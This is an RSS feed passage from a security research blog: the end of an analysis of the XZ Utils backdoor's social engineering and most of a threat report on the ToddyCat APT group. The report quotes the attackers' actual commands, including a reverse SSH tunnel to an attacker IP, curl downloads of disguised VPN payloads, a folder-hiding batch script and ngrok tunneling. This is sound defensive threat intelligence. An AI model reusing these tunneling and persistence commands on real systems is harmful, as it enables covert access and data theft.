  899. encoding / decoding and a few updates that Brett Okken had submitted<br />
  900. (but are still waiting for merge). Should I add these things to only<br />
  901. my local version, or is there a plan for these things in the future?</td>
  902. </tr>
  903. <tr>
  904. <td>Tue, 21 Jun 2022 13:24:47 -0700</td>
  905. <td><a href="https://www.mail-archive.com/xz-devel@tukaani.org/msg00569.html" target="_blank" rel="noopener">Re: [xz-devel] XZ for Java</a></td>
  906. </tr>
  907. <tr>
  908. <td colspan="2">I am sorry about your mental health issues, but its important to be<br />
  909. aware of your own limits. I get that this is a hobby project for all<br />
  910. contributors, but the community desires more. Why not pass on<br />
  911. maintainership for XZ for C so you can give XZ for Java more<br />
  912. attention? Or pass on XZ for Java to someone else to focus on XZ for<br />
  913. C? Trying to maintain both means that neither are maintained well.</td>
  914. </tr>
  915. </tbody>
  916. </table>
  917. <p>Reflecting on these data points still leads us to shaky ground. Until more details are publicized, we are left with speculation:</p>
  918. <ul>
  919. <li>In a three-year project, a small team successfully penetrated the XZ Utils codebase with a slow and low-pressure campaign. They manipulated the introduction of a malicious actor into the trusted position of code co-maintainer. They then initiated and attempted to speed up the process of distributing malicious code targeting sshd to major vendor Linux distributions</li>
  920. <li>In a three-year project, an individual successfully penetrated the XZ Utils codebase with a slow and low-pressure campaign. The one individual managed several identities to manipulate their own introduction into the trusted position of open source co-maintainer. They then initiated and attempted to speed up the process of distributing malicious code targeting sshd to major vendor Linux distributions</li>
  921. <li>In an extremely short timeframe in early 2024, a small team successfully manipulated an individual (Jia Tan) that legitimately earned access to an interesting open-source project as code maintainer. Two other individuals (Jigar Kumar, Dennis Ens) may have coincidentally complained and pressured Collin to hand over the maintainer role. That leveraged individual began inserting malicious code into the project over the course of a couple of weeks.</li>
  922. </ul>
  923. <h2 id="spring-2024-pressure-to-import-backdoored-code-to-debian">Spring 2024 Pressure to Import Backdoored Code to Debian</h2>
  924. <p>Several identities attempted to pressure Debian maintainers to import the backdoored upstream XZ Utils code to their distribution in March 2024. The Hans Jansen identity created a <a href="https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1067708" target="_blank" rel="noopener">Debian report log</a> on March 25, 2024 to raise urgency to include the backdoored code: &#8220;Dear mentors, I am looking for a sponsor for my package &#8220;xz-utils&#8221;.&#8221;</p>
  925. <table width="100%">
  926. <tbody>
  927. <tr>
  928. <td width="50%"><strong>Name</strong></td>
  929. <td width="50%"><strong>Email address</strong></td>
  930. </tr>
  931. <tr>
  932. <td>Hans Jansen</td>
  933. <td>hansjansen162@outlook.com</td>
  934. </tr>
  935. <tr>
  936. <td>krygorin4545</td>
  937. <td>krygorin4545@proton.me</td>
  938. </tr>
  939. <tr>
  940. <td>misoeater91@tutamail.com</td>
  941. <td>misoeater91@tutamail.com</td>
  942. </tr>
  943. </tbody>
  944. </table>
  945. <p>The thread was responded to within a day by additional identities using the email address scheme name-number@freeservice[.]com:</p>
  946. <table>
  947. <tbody>
  948. <tr>
  949. <td>Date: Tue, 26 Mar 2024 19:27:47 +0000</td>
  950. <td>From: krygorin4545 &lt;krygorin4545@proton.me&gt;</td>
  951. </tr>
  952. <tr>
  953. <td colspan="2"><a href="https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1067708;msg=17">Subject: Re: RFS: xz-utils/5.6.1-0.1 [NMU] &#8212; XZ-format compression utilities</a></td>
  954. </tr>
  955. <tr>
  956. <td colspan="2">Also seeing this bug. Extra valgrind output causes some failed tests for me. Looks like the new version will resolve it. Would like this new version so I can continue work</td>
  957. </tr>
  958. <tr>
  959. <td>Date: Tue, 26 Mar 2024 22:50:54 +0100 (CET)</td>
  960. <td>From: misoeater91@tutamail.com</td>
  961. </tr>
  962. <tr>
  963. <td colspan="2"><a href="https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1067708;msg=22">Subject: Re: RFS: xz-utils/5.6.1-0.1 [NMU] &#8212; XZ-format compression</a></td>
  964. </tr>
  965. <tr>
  966. <td colspan="2">I noticed this last week and almost made a valgrind bug. Glad to see it being fixed. Thanks Hans!</td>
  967. </tr>
  968. </tbody>
  969. </table>
  970. <p>The code changes received pushback from Debian contributors:</p>
  971. <table>
  972. <tbody>
  973. <tr>
  974. <td>Date: Tue, 26 Mar 2024 22:11:19 +0000 (UTC)</td>
  975. <td>From: Thorsten Glaser &lt;tg@debian.org&gt;</td>
  976. </tr>
  977. <tr>
  978. <td colspan="2"><a href="https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1067708;msg=27">Subject: new upstream versions as NMU vs. xz maintenance</a></td>
  979. </tr>
  980. <tr>
  981. <td colspan="2">Very much *not* a fan of NMUs doing large changes such as<br />
  982. new upstream versions.But this does give us the question, what&#8217;s up with the<br />
  983. maintenance of xz-utils? Same as with the lack of security<br />
  984. uploads of git, which you also maintain, are you active?</td>
  985. </tr>
  986. <tr>
  987. <td colspan="2">Are you well?</td>
  988. </tr>
  989. </tbody>
  990. </table>
  991. <p>To which one of these likely sock puppet accounts almost immediately responded, in order to counteract any distraction from pushing the changes:</p>
  992. <table>
  993. <tbody>
  994. <tr>
  995. <td>Date: Wed, 27 Mar 2024 12:46:32 +0000</td>
  996. <td>From: krygorin4545 &lt;krygorin4545@proton.me&gt;</td>
  997. </tr>
  998. <tr>
  999. <td colspan="2"><a href="https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1067708#37">Subject: Re: Bug#1067708: new upstream versions as NMU vs. xz maintenance</a></td>
  1000. </tr>
  1001. <tr>
  1002. <td colspan="2">Instead of having a policy debate over who is proper to do this upload, can this just be fixed? The named maintainer hasn&#8217;t done an upload in 5 years. Fedora considered this a serious bug and fixed it weeks ago (&lt;https://bugzilla.redhat.com/show_bug.cgi?id=2267598&gt;). Fixing a valgrind break across many apps throughout Debian is the priority here.</td>
  1003. </tr>
  1004. </tbody>
  1005. </table>
  1006. <h2 id="what-nexzt">What NeXZt?</h2>
  1007. <p>Clearly social engineering techniques have much lower technical requirements to gain full access to development environments than what we saw with prior supply chain attacks like the Solarwinds, M.E.Doc ExPetya, and ASUS ShadowHammer incidents. We have presented and compared these particular supply chain attacks, their techniques, and their complexities, at <a href="https://securelist.com/webinars/sas-2021-time-to-make-the-donuts/" target="_blank" rel="noopener"> prior SAS events [registration required]</a>, distilling an assessment into a manageable table.</p>
  1008. <p>Unfortunately, we expect more open-source project incidents like XZ Utils compromise to be exposed in the months to come. As a matter of fact, at the time of this writing, the Open Source Security Foundation (OSSF) has identified <a href="https://openssf.org/blog/2024/04/15/open-source-security-openssf-and-openjs-foundations-issue-alert-for-social-engineering-takeovers-of-open-source-projects/" target="_blank" rel="noopener">similar social engineering-driven incidents</a> in other open-source projects, and claims that the XZ Utils social engineering effort is highly likely not an isolated incident.</p>
  1009. ]]></content:encoded>
  1011. <wfw:commentRss>https://securelist.com/xz-backdoor-story-part-2-social-engineering/112476/feed/</wfw:commentRss>
  1012. <slash:comments>2</slash:comments>
  1015. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/23205014/sl-dark-sillouettes-laptops-binary-background-green-scaled.jpg" width="2668" height="1499"><media:keywords>full</media:keywords></media:content>
  1016. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/23205014/sl-dark-sillouettes-laptops-binary-background-green-1024x575.jpg" width="1024" height="575"><media:keywords>large</media:keywords></media:content>
  1017. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/23205014/sl-dark-sillouettes-laptops-binary-background-green-300x169.jpg" width="300" height="169"><media:keywords>medium</media:keywords></media:content>
  1018. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/23205014/sl-dark-sillouettes-laptops-binary-background-green-150x150.jpg" width="150" height="150"><media:keywords>thumbnail</media:keywords></media:content>
  1019. </item>
  1020. <item>
  1021. <title>ToddyCat is making holes in your infrastructure</title>
  1022. <link>https://securelist.com/toddycat-traffic-tunneling-data-extraction-tools/112443/</link>
  1023. <comments>https://securelist.com/toddycat-traffic-tunneling-data-extraction-tools/112443/#comments</comments>
  1025. <dc:creator><![CDATA[Andrey Gunkin, Alexander Fedotov, Natalya Shornikova]]></dc:creator>
  1026. <pubDate>Mon, 22 Apr 2024 10:00:00 +0000</pubDate>
  1027. <category><![CDATA[APT reports]]></category>
  1028. <category><![CDATA[APT]]></category>
  1029. <category><![CDATA[Cyber espionage]]></category>
  1030. <category><![CDATA[Data theft]]></category>
  1031. <category><![CDATA[SSH]]></category>
  1032. <category><![CDATA[Targeted attacks]]></category>
  1033. <category><![CDATA[ToddyCat]]></category>
  1034. <category><![CDATA[VPN]]></category>
  1035. <category><![CDATA[WhatsApp]]></category>
  1036. <category><![CDATA[APT (Targeted attacks)]]></category>
  1037. <guid isPermaLink="false">https://kasperskycontenthub.com/securelist/?p=112443</guid>
  1038.  
  1039. <description><![CDATA[We continue to report on the APT group ToddyCat. This time, we’ll talk about traffic tunneling, constant access to a target infrastructure and data extraction from hosts.]]></description>
  1040. <content:encoded><![CDATA[<p><img width="990" height="400" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/22071148/sl_toddy_cat_palm_civet_in_a_digital_tube_photoreal-990x400.jpg" class="attachment-securelist-huge-promo size-securelist-huge-promo wp-post-image" alt="" decoding="async" loading="lazy" /></p><p>We continue covering the activities of the APT group <a href="https://securelist.com/tag/toddycat/" target="_blank" rel="noopener"><strong>ToddyCat</strong></a>. In our <a href="https://securelist.com/toddycat-keep-calm-and-check-logs/110696/" target="_blank" rel="noopener">previous article</a>, we described tools for collecting and exfiltrating files (<strong>LoFiSe</strong> and <strong>PcExter</strong>). This time, we have investigated how attackers obtain constant access to compromised infrastructure, what information on the hosts they are interested in, and what tools they use to extract it.</p>
  1041. <p><strong>ToddyCat </strong>is an <a href="https://encyclopedia.kaspersky.ru/glossary/apt-advanced-persistent-threats/" target="_blank" rel="noopener">APT</a> group that predominantly targets governmental organizations, some of them defense related, located in the Asia-Pacific region. One of the group&#8217;s main goals is to steal sensitive information from hosts.</p>
  1042. <p>During the observation period, we noted that this group stole data on an industrial scale. To collect large volumes of data from many hosts, attackers need to automate the data harvesting process as much as possible, and provide several alternative means to continuously access and monitor systems they attack. We decided to investigate how this was implemented by ToddyCat. Note that all tools described in this article are applied at the stage where the attackers have compromised high-privileged user credentials allowing them to connect to remote hosts. In most cases, the adversary connected, transferred and run all required tools with the help of <a href="https://learn.microsoft.com/en-us/sysinternals/downloads/psexec" target="_blank" rel="noopener">PsExec</a> or <a href="https://github.com/fortra/impacket" target="_blank" rel="noopener">Impacket</a>.</p>
  1043. <h2 id="tools-for-traffic-tunneling">Tools for traffic tunneling</h2>
  1044. <p>Having several tunnels to the infected infrastructure implemented with different tools allow attackers to maintain access to systems even if one of the tunnels is discovered and eliminated. By securing constant access to the infrastructure, attackers are able to perform reconnaissance and connect to remote hosts.</p>
  1045. <h3 id="reverse-ssh-tunnel">Reverse SSH Tunnel</h3>
  1046. <p>One way to gain access to remote network services is to create a reverse SSH tunnel.</p>
  1047. <p>Attackers use several files to launch a reverse SSH tunnel:</p>
  1048. <ol>
  1049. <li>The SSH client from the OpenSSH for Windows toolkit, along with the library required for running it</li>
  1050. <li>An OPENSSH private key file</li>
  1051. <li>The &#8220;<strong>a.bat</strong>&#8221; script to hide the private key file</li>
  1052. </ol>
  1053. <p>The attackers transferred all files to the target host via <strong>SMB </strong>with the help of shared folders <strong>(<a href="https://attack.mitre.org/techniques/T1021/002/">T1021.002: </a><a href="https://attack.mitre.org/techniques/T1021/002/" target="_blank" rel="noopener">Remote Services: SMB/Windows Admin Shares</a>)</strong>.</p>
  1054. <p>The attackers did not attempt to hide the presence of the SSH client file in the system. The file retained its original name and was placed inside folders whose names indicated the presence of an SSH client in the system.</p><pre class="crayon-plain-tag">C:\program files\OpenSSH\ssh.exe
  1055. C:\programdata\sshd\ssh.exe
  1056. C:\programdata\ssh\ssh.exe</pre><p>
  1057. The private key files required for establishing a connection to the remote server were copied to the following paths.</p><pre class="crayon-plain-tag">C:\Windows\AppReadiness\read.ini
  1058. C:\Windows\AppReadiness\data.dat
  1059. C:\Windows\AppReadiness\log.dat
  1060. C:\Windows\AppReadiness\value.dat</pre><p>
  1061. <strong>OpenSSH </strong>private key files are normally created without extensions, but they can be given the extension .key or similar. In the example, the attackers used .ini and .dat extensions for private key files, obviously to hide their true purpose. Files like that look less suspicious in the command-line interface than .key files or files without an extension.</p>
  1062. <p>After the private key files have been copied to the <strong>AppReadiness </strong>folder, the adversary copies and runs an <strong>a.bat</strong> script. In the attacked systems, it was found mostly in temporary directories or in users&#8217; shared folders.</p><pre class="crayon-plain-tag">c:\users\public\a.bat</pre><p>
  1063. This file contains the following commands.</p><pre class="crayon-plain-tag">@echo off
  1064. ::# Set Key File Variable:
  1065.  
  1066. Set Key="C:\Windows\AppReadiness"
  1067.  
  1068. takeown /f "%Key%"
  1069. icacls "%Key%" /remove "BUILTIN\Administrators" &gt; "%temp%\a.txt"
  1070. icacls "%Key%" /remove "Administrators" &gt;&gt; "%temp%\a.txt"
  1071. icacls "%Key%" /remove "NT AUTHORITY\Authenticated Users" &gt;&gt; "%temp%\a.txt"
  1072. icacls "%Key%" /remove "CREATOR OWNER" &gt;&gt; "%temp%\a.txt"
  1073. icacls "%Key%" /remove "BUILTIN\Users" &gt;&gt; "%temp%\a.txt"
  1074. icacls "%Key%" /remove "Users" &gt;&gt; "%temp%\a.txt"
  1075. icacls "%Key%" &gt;&gt; "%temp%\a.txt"
  1076.  
  1077. ::# Remove Variable:
  1078. set "Key="</pre><p>
  1079. In Windows,<strong> C:\Windows\AppReadiness</strong> is part of the AppReadiness service and stores application files for initial configuration when applications are first launched or when a user logs on for the first time.</p>
  1080. <div id="attachment_112447" style="width: 813px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19154001/ToddyCat_data_collection_and_tunneling_01.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112447" class="size-full wp-image-112447" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19154001/ToddyCat_data_collection_and_tunneling_01.png" alt="The icacls command output for the AppReadiness folder with default values" width="803" height="167" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19154001/ToddyCat_data_collection_and_tunneling_01.png 803w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19154001/ToddyCat_data_collection_and_tunneling_01-300x62.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19154001/ToddyCat_data_collection_and_tunneling_01-768x160.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19154001/ToddyCat_data_collection_and_tunneling_01-800x166.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19154001/ToddyCat_data_collection_and_tunneling_01-740x154.png 740w" sizes="(max-width: 803px) 100vw, 803px" /></a><p id="caption-attachment-112447" class="wp-caption-text">The icacls command output for the AppReadiness folder with default values</p></div>
  1081. <p>The image above shows the default permissions for this folder:</p>
  1082. <ul>
  1083. <li>Administrators and system: full permissions</li>
  1084. <li>Authorized users: read-only permissions</li>
  1085. </ul>
  1086. <p>This means that regular users can view the contents of the folder.</p>
  1087. <p>The <strong>a.bat</strong> script sets the system as the owner of the folder and removes all other users from its discretionary access control list (DACL). The image below shows the DACL for <strong>C:\Windows\AppReadiness</strong> after the script has run:</p>
  1088. <div id="attachment_112448" style="width: 803px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19154051/ToddyCat_data_collection_and_tunneling_02.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112448" class="size-full wp-image-112448" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19154051/ToddyCat_data_collection_and_tunneling_02.png" alt="The icacls command output for the AppReadiness folder after a.bat script has executed" width="793" height="101" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19154051/ToddyCat_data_collection_and_tunneling_02.png 793w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19154051/ToddyCat_data_collection_and_tunneling_02-300x38.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19154051/ToddyCat_data_collection_and_tunneling_02-768x98.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19154051/ToddyCat_data_collection_and_tunneling_02-740x94.png 740w" sizes="(max-width: 793px) 100vw, 793px" /></a><p id="caption-attachment-112448" class="wp-caption-text">The icacls command output for the AppReadiness folder after a.bat script has executed</p></div>
  1089. <p>Once the permissions have been changed, neither normal users nor administrators will be able to access this folder. Attempting to open it will cause a &#8220;no permission&#8221; error.</p>
  1090. <div id="attachment_112449" style="width: 746px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19154137/ToddyCat_data_collection_and_tunneling_03.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112449" class="size-full wp-image-112449" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19154137/ToddyCat_data_collection_and_tunneling_03.png" alt="Access denied error and Security tab for the AppReadiness folder" width="736" height="496" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19154137/ToddyCat_data_collection_and_tunneling_03.png 736w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19154137/ToddyCat_data_collection_and_tunneling_03-300x202.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19154137/ToddyCat_data_collection_and_tunneling_03-519x350.png 519w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19154137/ToddyCat_data_collection_and_tunneling_03-415x280.png 415w" sizes="(max-width: 736px) 100vw, 736px" /></a><p id="caption-attachment-112449" class="wp-caption-text">Access denied error and Security tab for the AppReadiness folder</p></div>
  1091. <p>To start the tunnel, attackers create a scheduled task that runs the following command.</p><pre class="crayon-plain-tag">C:\PROGRA~1\OpenSSH\ssh.exe -i C:\Windows\AppReadiness\value.dat -o
  1092. StrictHostKeyChecking=accept-new -R 31481:localhost:53
  1093. systemtest01@103[.]27.202.85 -p 22222 -fN</pre><p>
  1094. This command creates an SSH connection to a remote server with the IP address <strong>103[.]27.202.85</strong> on port <strong>22222 </strong>as the user named <strong>systemtestXX</strong>, where <strong>XX</strong> is a number. This connection will redirect network traffic from a certain port on the server to a certain port on the infected host. This is needed to provide the malicious server with constant access to the services running on the target host and listening on the specified port.</p>
  1095. <p>In the example above, the user <strong>systemtest01</strong> establishes a connection that redirects traffic from port <strong>31481 </strong>on the server to port <strong>53</strong> on the target host. A connection like this created on domain controllers allows attackers to obtain the IP addresses of hosts on the internal network through DNS queries.</p>
  1096. <p>Each user is assigned to a different port on the infected host. For example, the user <strong>systemtest05 </strong>redirects traffic from the malicious server to port <strong>445</strong>, normally used by SMB services.</p>
  1097. <p>The remote server IP information is shown in the table below.</p>
  1098. <table width="100%">
  1099. <tbody>
  1100. <tr>
  1101. <td width="17%"><strong>IP</strong></td>
  1102. <td width="16%"><strong>Country + ASN</strong></td>
  1103. <td width="16%"><strong>Net name</strong></td>
  1104. <td width="17%"><strong>Net Description</strong></td>
  1105. <td width="17%"><strong>Address </strong></td>
  1106. <td width="17%"><strong>Email </strong></td>
  1107. </tr>
  1108. <tr>
  1109. <td>103.27.202[.]85</td>
  1110. <td>Thailand, AS58955</td>
  1111. <td>BANGMOD-VPS-NETWORK</td>
  1112. <td>Bangmod VPS Network</td>
  1113. <td>Bangmod-IDC Supermicro Thailand Powered by CSloxinfo</td>
  1114. <td>support@bangmod.co.th</td>
  1115. </tr>
  1116. </tbody>
  1117. </table>
  1118. <p>The whole process of creating an SSH tunnel can be described with the diagram given below.</p>
  1119. <div id="attachment_112450" style="width: 1034px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/22103620/ToddyCat_data_clollection_and_tunneling_042.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112450" class="size-large wp-image-112450" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/22103620/ToddyCat_data_clollection_and_tunneling_042.png" alt="Diagram of SSH tunnel creation" width="1024" height="459" /></a><p id="caption-attachment-112450" class="wp-caption-text">Diagram of SSH tunnel creation</p></div>
  1120. <h3 id="softether-vpn">SoftEther VPN</h3>
  1121. <p>The next tool that the attackers used for tunneling was the server utility (VPN Server) from the SoftEther VPN package.</p>
  1122. <p><a href="https://www.softether.org" target="_blank" rel="noopener">SoftEther VPN</a> is an open-source solution developed as part of academic research at the University of Tsukuba that allows creating VPN connections via many popular protocols, such as L2TP/IPsec, OpenVPN, MS-SSTP, L2TPv3, EtherIP and others.</p>
  1123. <p>To launch the VPN server, the attackers used the following files:</p>
  1124. <ul>
  1125. <li><strong>vpnserver_x64.exe</strong>: a digitally signed VPN server executable</li>
  1126. <li><strong>hamcore.se2</strong>: a container file that includes components required to run vpnserver_x64.exe</li>
  1127. <li><strong>vpn_server.config</strong>: server configuration</li>
  1128. </ul>
  1129. <p>In the operating system, the VPN server can run as a service or as an application with a GUI. The mode is set via a command-line parameter.</p>
  1130. <p>In virtually every case we observed, the attackers renamed <strong>vpnserver_x64.exe</strong> to hide its purpose in the infected system. The following names of, and paths to, this file are known:</p><pre class="crayon-plain-tag">c:\programdata\ssh\vmtools.exe
  1131. c:\programdata\lenovo\lenovo\kln.exe
  1132. c:\programdata\iobit\iobitrtt\tmp\mstime.exe
  1133. c:\perflogs\ecache\boot.exe
  1134. C:\users\public\music\wia.exe
  1135. c:\windows\debug\wia\wia.exe
  1136. c:\users\public\music\taskllst.exe
  1137. c:\programdata\lenovo\lenovo\main.exe
  1138. c:\programdata\intel\gcc\gcc\boot.exe
  1139. c:\programdata\lenovo\lenovodisplaycontrolcenterservice\netscan.exe
  1140. c:\programdata\kasperskylab\kaspersky.exe</pre><p>
  1141. You may notice that in some cases, the attackers used the names of security products to conceal the purpose of the file.</p>
  1142. <p>The file <strong>hamcore.se2</strong> was not renamed in the attacked systems, as it was loaded by the VPN server by name from the same folder where the VPN server executable was located.</p>
  1143. <p>To transfer the tools to victim hosts, the attackers used their standard technique of copying files through shared resources (<strong><a href="https://attack.mitre.org/techniques/T1021/002/" target="_blank" rel="noopener">T1021.002 Remote Services: SMB/Windows Admin Shares</a></strong>), and downloaded files from remote resources using the <strong>curl </strong>utility (see below).</p><pre class="crayon-plain-tag">"cmd.exe" /C curl http://www.netportal.or[.]kr/common/css/main.js -o
  1144. c:\windows\debug\wia\wia.exe &gt; C:\WINDOWS\Temp\vwqkspeq.tmp 2&gt;&amp;1
  1145. "cmd.exe" /C curl http://www.netportal.or[.]kr/common/css/ham.js -o
  1146. c:\windows\debug\wia\hamcore.se2 &gt; C:\WINDOWS\Temp\nohEicOE.tmp 2&gt;&amp;1</pre><p>
  1147. We observed the following remote resources being used as download sources.</p>
  1148. <table width="100%">
  1149. <tbody>
  1150. <tr>
  1151. <td width="65%"><strong>URL</strong></td>
  1152. <td width="35%"><strong>Original file name</strong></td>
  1153. </tr>
  1154. <tr>
  1155. <td>hxxp://www.netportal.or[.]kr/common/css/main.js</td>
  1156. <td>vpnserver_x64.exe</td>
  1157. </tr>
  1158. <tr>
  1159. <td>hxxp://www.netportal.or[.]kr/common/css/ham.js</td>
  1160. <td>Hamcore.se2</td>
  1161. </tr>
  1162. <tr>
  1163. <td>hxxp://23.106.122[.]5/hamcore.se2</td>
  1164. <td>Hamcore.se2</td>
  1165. </tr>
  1166. <tr>
  1167. <td>hxxps://etracking.nso.go[.]th/UserFiles/File/111/tasklist.exe</td>
  1168. <td>vpnserver_x64.exe</td>
  1169. </tr>
  1170. <tr>
  1171. <td>hxxps://etracking.nso.go[.]th/UserFiles/File/111/hamcore.se2</td>
  1172. <td>Hamcore.se2</td>
  1173. </tr>
  1174. </tbody>
  1175. </table>
  1176. <p>In most cases, the configuration file was copied along with the server executable. However, in some cases, it was not copied but created by executing vpnserver_x64.exe with the options <strong>/install</strong> or <strong>/usermode_hidetray</strong>, and then edited.</p><pre class="crayon-plain-tag">"cmd.exe" /C c:\users\public\music\taskllst.exe /install &gt; C:\Windows\Temp\fnOcaiqm.tmp 2&gt;&amp;1
  1177. "cmd.exe" /C c:\users\public\music\taskllst.exe /usermode_hidetray &gt; C:\Windows\Temp\TSwkLRsR.tmp</pre><p>
  1178. In this case, after installing the server in the system, the attackers changed the server settings in <strong>vpn_server.config</strong>.</p>
  1179. <p>Data for connecting the remote client to the server and its authentication details are added to the configuration file:</p>
  1180. <table width="100%">
  1181. <tbody>
  1182. <tr>
  1183. <td width="60%"><strong>AccountName</strong></td>
  1184. <td width="40%"><strong>Hostname</strong></td>
  1185. </tr>
  1186. <tr>
  1187. <td>ha.bbmouseme[.]com</td>
  1188. <td>118[.]193.40.42</td>
  1189. </tr>
  1190. </tbody>
  1191. </table>
  1192. <h3 id="ngrok-agent-and-krong">Ngrok agent and Krong</h3>
  1193. <p>Another way the attackers accessed the remote infrastructure was by tunneling to a legitimate cloud provider. An application running on the user&#8217;s host with access to the local infrastructure can connect through a legitimate agent to the cloud and redirect traffic or run certain commands.</p>
  1194. <p><a href="https://ngrok.com/docs/agent/" target="_blank" rel="noopener">Ngrok</a> is a lightweight agent that can redirect traffic from endpoints to cloud infrastructure and vice versa. The attackers installed ngrok on target hosts and used it to redirect C2 traffic from the cloud infrastructure to a certain port on these hosts.</p>
  1195. <p>The agent can be started, for instance, with the following command.</p><pre class="crayon-plain-tag">"cmd" /c "cd C:\windows\temp\ &amp; Intel.exe tcp --region=ap --remote-addr=1.tcp.ap.ngrok.io:21146 54112 --
  1196. authtoken 2GskqGD&lt;token&gt;txB7WyV"</pre><p>
  1197. The port where ngrok redirects C2 traffic is also the port that another tool, Krong, listens on. Krong is a DLL file <a href="https://encyclopedia.kaspersky.com/glossary/dll-sideloading/" target="_blank" rel="noopener">side-loaded</a> <strong>(<a href="https://attack.mitre.org/techniques/T1574/002/" target="_blank" rel="noopener">T1574.002 Hijack Execution Flow: DLL Side-Loading</a>)</strong> with a legitimate application digitally signed by AVG TuneUp. The tool receives through the command-line interface the address and the port on which to expect a connection.</p><pre class="crayon-plain-tag">"cmd" /c "cd C:\windows\temp\ &amp; SystemInformation.exe 0.0.0.0 54112"</pre><p>
  1198. Krong is a proxy that encrypts the data transmitted through it using the XOR function.</p>
  1199. <div id="attachment_112451" style="width: 343px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19155605/ToddyCat_data_collection_and_tunneling_05.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112451" class="size-full wp-image-112451" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19155605/ToddyCat_data_collection_and_tunneling_05.png" alt="Code snippet for deciphering received data" width="333" height="457" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19155605/ToddyCat_data_collection_and_tunneling_05.png 333w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19155605/ToddyCat_data_collection_and_tunneling_05-219x300.png 219w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19155605/ToddyCat_data_collection_and_tunneling_05-255x350.png 255w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/19155605/ToddyCat_data_collection_and_tunneling_05-204x280.png 204w" sizes="(max-width: 333px) 100vw, 333px" /></a><p id="caption-attachment-112451" class="wp-caption-text">Code snippet for deciphering received data</p></div>
  1200. <p>This allows Krong to hide the contents of the traffic to evade detection.</p>
  1201. <h3 id="frp-client">FRP client</h3>
  1202. <p>After creating tunnels on target hosts using OpenSSH or SoftEther VPN, attackers additionally install the <a href="https://github.com/fatedier/frp" target="_blank" rel="noopener">FRP client</a>. FRP is a fast reverse proxy written in Go that allows access from the Internet to a local server located behind a NAT or firewall. FRP has a web interface for changing settings and viewing connection statistics.</p>
  1203. <p>The attackers used two files to run the client:</p>
  1204. <ul>
  1205. <li><strong>Frpc.exe</strong>: a FRP client executable file</li>
  1206. <li><strong>Frpc.toml</strong>: a client configuration file</li>
  1207. </ul>
  1208. <p>The files are given arbitrary names. Also, the configuration file extension is changed from the standard .toml to .ini, as is the case with OpenSSH private key files.</p>
  1209. <p>After copying the files to the target host, the attackers create a service with an arbitrary name, which is started via the following command.</p><pre class="crayon-plain-tag">c:\windows\debug\tck.exe -c c:\windows\debug\tc.ini</pre><p>
  1210. This starts the FRP client with the configuration file &#8220;tc.ini&#8221;. The traffic is then routed from C2 through this tool.</p>
  1211. <h2 id="data-collection-tools">Data collection tools</h2>
  1212. <h3 id="cuthead-for-data-collection">Cuthead for data collection</h3>
  1213. <p>Recently, ToddyCat started using a new tool we named <strong>cuthead </strong>to search for documents. The name originated from the &#8220;file description&#8221; field of the sample we found. It is a .NET compiled executable designed to search for files and store those it finds inside an archive. The tool can search for specified file extensions or words in the file name.</p>
  1214. <p>Cuthead tool accepts the following arguments:</p><pre class="crayon-plain-tag">fkw.exe &lt;date&gt; &lt;extensions&gt; [keywords]</pre><p>
  1215. <ul>
  1216. <li><strong>Date:</strong> the date when the file was last modified, in <strong>yyyyMMdd </strong> The search looks for files modified on that date or later</li>
  1217. <li><strong>Extensions</strong>: a string without spaces that contains file extensions separated by semicolons</li>
